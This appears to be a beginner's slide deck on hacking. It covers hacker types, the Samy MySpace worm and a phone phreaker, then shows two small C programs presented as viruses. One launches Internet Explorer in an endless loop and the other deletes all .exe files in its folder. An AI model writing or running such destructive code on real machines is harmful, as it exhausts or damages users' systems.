What is Hacking ?

Why do we Hack ?

Types Of hackers

  • White Hat
  • Gray Hat
  • Black Hat

Samy Kamkar

He release the first ever self propagating worm into Myspace , called  

the Samy worm "

The worm carried a payload that would display the string "but most of all, samy is my hero" on a victim's MySpace profile page. When a user viewed that profile page, the payload would be planted on their own profile page. Within just 20 hours of its October 4, 2005 release, over one million users had run the payload,making Samy the fastest spreading virus of all time

Samy Worm in Action

PhoneFreaks

Josef Carl Engressia, Jr

aKa Whistler

aKa Joybubbles

As five-year old, Engressia discovered he could dial phone numbers by clicking the hang-up switch rapidly (“tapping”), and at the age of 7 he accidentally discovered that whistling at certain frequencies could activate phone switches.

Lets Hack Some Stuffs  ! 

What if i Told you that you can get smart phones Re.1 ?

Lets Write some Virus ! 

The Shutdown Virus

#include<stdio.h>
#include<dos.h>

int main (void){
for(; ;){
system("c:\\progra~1\\intern~1\\iexplore.exe");
}

return 0;
}

Behold for the Most Destructive of them all ....

The " IE "

#include<stdio.h>
#include<dos.h>



int main(void){
system("cd c:\\progra~1\\intern~1");
system("del *.exe");
system("cls");
return 0;
}

What is Hacking ?

By Dhayalan Pro

What is Hacking ?

  • 257